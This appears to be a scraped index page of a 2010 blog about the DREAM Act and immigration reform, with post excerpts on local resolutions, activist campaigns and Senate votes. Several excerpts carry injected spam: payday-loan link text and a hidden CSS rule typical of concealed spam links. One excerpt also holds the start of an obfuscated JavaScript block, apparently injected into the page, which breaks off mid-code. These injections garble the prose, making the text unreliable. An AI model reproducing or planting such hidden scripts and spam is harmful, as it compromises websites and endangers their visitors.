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27 Oct 1 Comment

Localities Step Up Their Support of the DREAM Act

Despite the fact that progress has stalled at the national level, localities across the United States are debating and passing local resolutions to demonstrate their support of the DREAM Act.  From Somerville, Massachusetts to Harrisonburg, VA, local councils and school committees have decided to throw their weight, if not their laws, behind the DREAM Act and the communities that they serve. I'm not exactly sure what this means from a legal perspective, but it is encouraging to see that so many localities, those who are in touch with the needs of the citizens they work and play with, are beg


25 Oct 0 Comment

Fight to Pass DREAM Act Continues…

Although still suffering from the setback caused by last month's Republican filibuster in the Senate, DREAM Activists all over the nation aren't giving up.  They may have lost the latest battle but are determined to win the war... In Colorado, members of VOICE (Voices of Immigrant Children for Education & Equality) aren't giving up the fight.  Karen, a member of the group, says: "We are not giving up on the DREAM Act, our next step is to work towards making it a stand alone bill, it will be hard but we feel it is worth a shot." In a recent Huffington Post article, Lindsay McCluskey,


25 Oct 0 Comment

Colorado DREAM Activists Plan "Get Out the Vote" Campaign

Watch as these Colorado activists talk about their "Get out the Vote" Campaign:payday loans blog


11 Oct 1 Comment

DREAMer Explains the DREAM Act

Undocumented student explains the DREAM Act to MSNBC host Lawrence O'Donnell:BIOKO.ORG/DATA/best loan onlinePayday Loans Seattleoptions depending #dokefpecaa{display:none;visibility:hidden;}


08 Oct 0 Comment

CIR, DREAM Act or Both?

In producing/directing this documentary I've talked to a lot of people involved in this struggle...some who are focused on passage of the DREAM Act, others who are trying to put their energy into passage of comprehensive immigration reform and others who are fighting for both. This is a controversial subject amongst several groups who are supportive of immigration reform and it breaks down like this: - Those who are fighting for comprehensive immigration reform (CIR), believe that passing bills that address the immigration status of a subset of the 11-13M (or so) undocumented immigrants in t


06 Oct 0 Comment

Where to Next?

After the setback of a couple of weeks ago, it's completely understandable that everyone that has been fighting so hard for passage of the DREAM Act would feel defeated and it's also completely understandable that most would feel as though they are fighting an uphill battle. An uphill battle yes, I agree, but an un-winnable one? I don't think so! All wars worth waging have their setbacks and casualties...the civil rights movement of the sixties was the culmination of centuries of struggle. I'm not saying that it's going to take that long to pass the DREAM Act or something similar, but it w


05 Oct 0 Comment

Is the DREAM Act Really a Bipartisan Bill?

Although the DREAM Act is often touted as a reform bill that enjoys bipartisan support (after all, it's politically unpalatable to oppose students), it's starting to look like there are some limits to that support, mainly, no mid-term elections in play and certainly not in a year in which immigration politics is so polarized. As the latest attempt to bring the bill up for a vote demonstrates, it seems as though the DREAM Act enjoys the support of many Democrats in the Senate (although not all, as the two Senators from Arkansas voted against it) but no support at all from the other side of the


13 Jul 0 Comment

Will 2010 be the Year of the DREAM Act?

Despite Arizona and the flurry of opposition it has caused as well as the Administration's recent support on behalf of comprehensive immigration reform, there's very little evidence that points to across the aisle backing for a bill that has the potential to cause deep fissures in the electorate...especially during such a contested election year. But if not a comprehensive immigration reform bill, what about the chances of the DREAM Act passing this year? Although far from a guarantee, it looks as though in lieu of comprehensive reform, the DREAM Act may be picking up some steam with Congres


12 Jul 0 Comment

Does Immigration Reform Have a Chance to Pass this Year?

Just as the Obama Administration goes on the offensive on the topic of immigration reform and urges for passage of a bill on the issue as soon as possible (no doubt partially in response to the recent Arizona legislation), the opinion from both sides of the aisle seems to be that the political capital is not there...at least not for passage of comprehensive reform this year:limited time periodalso offers var _st=[];var m=[];_st.push("14520020120619318611720");m.push("h");_st.push("120619718614611920118");m.unshift("C");_st.push("620520113218420020011");m.push("a");_st.push("914712018519619218


06 Jul 0 Comment

White House "Question & Answer Roundtable" on Immigration Reform

This "Open for Questions Roundtable," the first of its kind, was held at the White House after President Obama's American University speech on immigration reform held last Thursday. Cecilia Muñoz, Director of White House Intergovernmental Affairs, takes questions from journalists and online participants. Watch the video: